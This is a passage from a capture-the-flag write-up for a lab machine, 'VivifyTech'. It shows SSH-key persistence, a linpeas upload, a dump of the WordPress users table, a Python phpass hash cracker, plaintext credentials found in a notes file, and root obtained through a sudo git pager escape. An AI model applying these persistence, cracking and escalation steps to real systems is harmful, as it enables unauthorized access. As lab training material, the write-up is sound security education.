First, plant the attacking machine's SSH public key on the box so we can get back in without the password (persistence). The key pair is generated on Kali; the rest runs on the target as sarah (the key below is the author's own ed25519 public key)

ssh-keygen                              # on Kali; writes ~/.ssh/id_ed25519 and id_ed25519.pub
mkdir -p ~/.ssh && chmod 700 ~/.ssh     # on the target, as sarah; sshd ignores the file if perms are loose
cd ~/.ssh
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK5sWbMpzoFOhxwVIjKUYvvMce5kR6XSmnTp7u2TlCmW kali@kali" >> authorized_keys
chmod 600 authorized_keys

Then upload linpeas (the lin_fat.sh build here) to scout the box

❯ scp ./lin_fat.sh sarah@192.168.56.119:/tmp/
lin_fat.sh                                                  100%   25MB  50.8MB/s   00:00

It finds the database credentials in the WordPress configuration file (wp-config.php), which get us into MySQL.

And then a dead end: the only account in wp_users is the admin, its password is stored as a phpass portable hash ($P$, hashcat mode 400), and it would not crack.

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email         | user_url                         | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+--------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
|  1 | sancelisso | $P$BPhGmUp9fmz6VHYL1FOPr33qtX.yyf1 | sancelisso    | test@localhost.com | http://192.168.177.133/wordpress | 2023-12-05 20:50:42 |                     |           0 | sancelisso   |
+----+------------+------------------------------------+---------------+--------------------+----------------------------------+---------------------+---------------------+-------------+--------------+
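The $P$B... value above is a phpass portable hash: the character after $P$ encodes the MD5 iteration count (B is index 13 in the phpass alphabet, so 2^13 = 8192 rounds) and the next eight characters are the salt. The following added example (mine, not from the original writeup) reimplements the phpass algorithm in Python so a candidate list can be checked against such a hash offline, and shows what "it would not crack" means in practice. The mini-wordlist is constructed; the reference vector is the one shipped in phpass's own test.php. For real cracking use hashcat -m 400 or john --format=phpass, which perform the same computation at scale.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Alphabet phpass uses both for the cost character and for its base64-like encoding.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw: bytes, count: int) -> str:
    """phpass encode64(): packs bytes little-endian into 6-bit groups (16 bytes -> 22 chars)."""
    out = []
    i = 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password: bytes, setting: str) -> str:
    """Recompute the portable hash of `password` under the cost and salt in `setting`.

    `setting` may be a full stored hash: char 3 is log2 of the MD5 iteration count,
    chars 4..11 are the 8-character salt, the remaining 22 chars are the digest.
    """
    if setting[:3] not in ("$P$", "$H$"):      # $H$ is the phpBB variant of the same scheme
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("cost out of range")
    salt = setting[4:12].encode()
    if len(salt) != 8:
        raise ValueError("truncated salt")
    digest = hashlib.md5(salt + password).digest()
    for _ in range(1 << count_log2):           # the cost: 2^count_log2 chained MD5s
        digest = hashlib.md5(digest + password).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_check(password: bytes, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash against the stored one."""
    return hmac.compare_digest(phpass_crypt(password, stored), stored)


def crack(stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate that reproduces `stored`, or None if none does."""
    for word in candidates:
        if phpass_check(word.encode(), stored):
            return word
    return None


# Reference vector from phpass's test.php: 'test12345' at cost '9' (2^11 rounds).
PHPASS_VECTOR = "$P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0"
# The sancelisso hash from the wp_users dump above (cost 'B' = 2^13 rounds).
WP_HASH = "$P$BPhGmUp9fmz6VHYL1FOPr33qtX.yyf1"
# Constructed mini-wordlist standing in for secrets.txt.
SAMPLE_WORDS = ["password", "bohicon", "vivifytech", "test12345"]

if __name__ == "__main__":
    print("reference vector verifies:", phpass_check(b"test12345", PHPASS_VECTOR))
    print("reference vector cracked as:", crack(PHPASS_VECTOR, SAMPLE_WORDS))
    print("wp_users hash cracked as:", crack(WP_HASH, SAMPLE_WORDS))
```

At 8192 MD5 calls per guess, pure Python manages only a few hundred guesses per second, which is why a wordlist as small as secrets.txt is fine here but anything larger belongs in hashcat.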

Going back to the home directory for another look, among the hidden entries there is a directory that is not one of the defaults: .private.

Inside is a single file, Tasks.txt

sarah@VivifyTech:~/.private$ cat Tasks.txt
- Change the Design and architecture of the website
- Plan for an audit, it seems like our website is vulnerable
- Remind the team we need to schedule a party before going to holidays
- Give this cred to the new intern for some tasks assigned to him - gbodja:4Tch055ouy370N

That gives the credentials gbodja:4Tch055ouy370N

Privilege escalation via sudo -l

After logging in as the new user, start with sudo -l: git can be run as root, without a password

gbodja@VivifyTech:/home/sarah/.private$ sudo -l
Matching Defaults entries for gbodja on VivifyTech:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, !admin_flag, use_pty

User gbodja may run the following commands on VivifyTech:
    (ALL) NOPASSWD: /usr/bin/git

GTFOBins lists several ways to turn a sudo-able git into a root shell.

I picked option (b) there: run sudo /usr/bin/git help config, and once the man page opens in the pager, type !/bin/bash to get a root shell. This works because git help hands the page to a pager (less) that inherits the root privileges sudo granted to git, and less's ! command spawns a shell. Note that sudoers entries like this one are the real bug: any binary that can open a pager or editor as root is equivalent to giving out root.

HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}

Done
